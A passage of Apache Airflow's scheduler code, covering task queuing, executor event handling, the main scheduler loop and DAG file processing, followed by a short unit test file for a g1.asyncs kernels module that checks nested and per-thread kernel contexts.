:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contain all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
states,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do not exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: Number of task instances with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
states,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
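# helpers.reduce_in_chunks above applies the query callable to consecutive
# slices of at most max_tis_per_query items, threading an accumulator through.
# A hedged sketch of that chunked reduction (not necessarily Airflow's own
# implementation; this sketch treats a non-positive chunk size as "everything
# in one chunk"):
def _reduce_in_chunks_sketch(fn, items, initial, chunk_size):
    items = list(items)
    if chunk_size <= 0:
        chunk_size = len(items) or 1
    acc = initial
    for start in range(0, len(items), chunk_size):
        acc = fn(acc, items[start:start + chunk_size])
    return acc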
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# TI.try_number returns the raw try_number + 1 while the TI is not
# running, so subtract 1 to match the DB record.
TI._try_number == try_number - 1,
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs to scheduled state
for task_instance in tis_to_set_to_scheduled:
task_instance.state = State.SCHEDULED
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs.
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: airflow.models.DAG
:param tis_out: A list to add generated TaskInstance objects
:type tis_out: list[TaskInstance]
:rtype: None
"""
for dag in dags:
dag = dagbag.get_dag(dag.dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag.dag_id)
continue
if dag.is_paused:
self.log.info("Not processing DAG %s since it's paused", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
self.manage_slas(dag)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state == State.FAILED or state == State.SUCCESS:
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says its {}. Was the task "
"killed externally?".format(ti, state, ti.state))
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception:
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in \
(executors.LocalExecutor, executors.SequentialExecutor):
pickle_dags = True
self.log.info("Running execute loop for %s seconds", self.run_duration)
self.log.info("Processing each file at most %s times", self.num_runs)
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self.subdir)
known_file_paths = list_py_file_paths(self.subdir)
self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)
def processor_factory(file_path, zombies):
return DagFileProcessor(file_path,
pickle_dags,
self.dag_ids,
zombies)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
known_file_paths,
self.num_runs,
processor_factory,
processor_timeout,
async_mode)
try:
self._execute_helper()
except Exception:
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
# For the execute duration, parse and schedule DAGs
while (timezone.utcnow() - execute_start_time).total_seconds() < \
self.run_duration or self.run_duration < 0:
self.log.debug("Starting Loop...")
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
self.log.debug("Harvesting DAG parsing results")
simple_dags = self.processor_agent.harvest_simple_dags()
self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if len(simple_dags) > 0:
try:
simple_dag_bag = SimpleDagBag(simple_dags)
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED,))
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
continue
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug(
"Ran scheduling loop in %.2f seconds",
loop_duration)
if not is_unit_test:
self.log.debug("Sleeping for %.2f seconds", self._processor_poll_interval)
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files"
" have been processed {} times".format(self.num_runs))
break
if loop_duration < 1 and not is_unit_test:
sleep_length = 1 - loop_duration
self.log.debug(
"Sleeping for {0:.2f} seconds to prevent excessive logging"
.format(sleep_length))
sleep(sleep_length)
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file, together with the number of import errors.
:param file_path: the path to the Python file that should be executed
:type file_path: unicode
:param zombies: zombie task instances to kill.
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
:param pickle_dags: whether to serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a list of SimpleDags made from the DAGs found in the file, plus
the number of import errors
:rtype: tuple[list[airflow.utils.dag_processing.SimpleDag], int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], 0
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
for dag in dagbag.dags.values():
dag.sync_to_db()
paused_dag_ids = [dag.dag_id for dag in dagbag.dags.values()
if dag.is_paused]
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id in dagbag.dags:
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
dag = dagbag.get_dag(dag_id)
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
if len(self.dag_ids) > 0:
dags = [dag for dag in dagbag.dags.values()
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dagbag.dags.values()
if not dag.parent_dag and
dag.dag_id not in paused_dag_ids]
# Not using multiprocessing.Queue() since it's no longer a separate
# process and due to some unusual behavior. (empty() incorrectly
# returns true as described in https://bugs.python.org/issue23582 )
ti_keys_to_schedule = []
self._process_dags(dagbag, dags, ti_keys_to_schedule)
for ti_key in ti_keys_to_schedule:
dag = dagbag.dags[ti_key[0]]
task = dag.get_task(ti_key[1])
ti = models.TaskInstance(task, ti_key[2])
ti.refresh_from_db(session=session, lock_for_update=True)
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
try:
dagbag.kill_zombies(zombies)
except Exception:
self.log.exception("Error killing zombies!")
return simple_dags, len(dagbag.import_errors)
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
|
test_public.py
|
import unittest
import threading
from g1.asyncs import kernels
class KernelsTest(unittest.TestCase):
def test_contexts(self):
def test_with_kernel():
self.assertIsNotNone(kernels.get_kernel())
self.assertIsNone(kernels.get_kernel())
kernels.call_with_kernel(test_with_kernel)
self.assertIsNone(kernels.get_kernel())
def test_nested(self):
ks = []
steps = []
outer(ks, steps)
self.assert_nested(ks, steps)
def test_nested_with_threads(self):
ks1 = []
steps1 = []
ks2 = []
steps2 = []
t1 = threading.Thread(target=outer, args=(ks1, steps1))
t2 = threading.Thread(target=outer, args=(ks2, steps2))
t1.start()
t2.start()
t1.join()
t2.join()
self.assert_nested(ks1, steps1)
self.assert_nested(ks2, steps2)
# Different kernels on different threads.
self.assertIsNot(ks1[0], ks2[0])
def assert_nested(self, ks, steps):
self.assertEqual(len(ks), 2)
self.assertIsNotNone(ks[0])
self.assertIs(ks[0], ks[1]) # Same kernel per thread.
self.assertEqual(steps, [1, 2, 3])
@kernels.with_kernel
def outer(ks, steps):
k = kernels.get_kernel()
ks.append(k)
steps.append(1)
inner(ks, steps)
steps.append(3)
@kernels.with_kernel
def inner(ks, steps):
k = kernels.get_kernel()
ks.append(k)
steps.append(2)
if __name__ == '__main__':
unittest.main()
|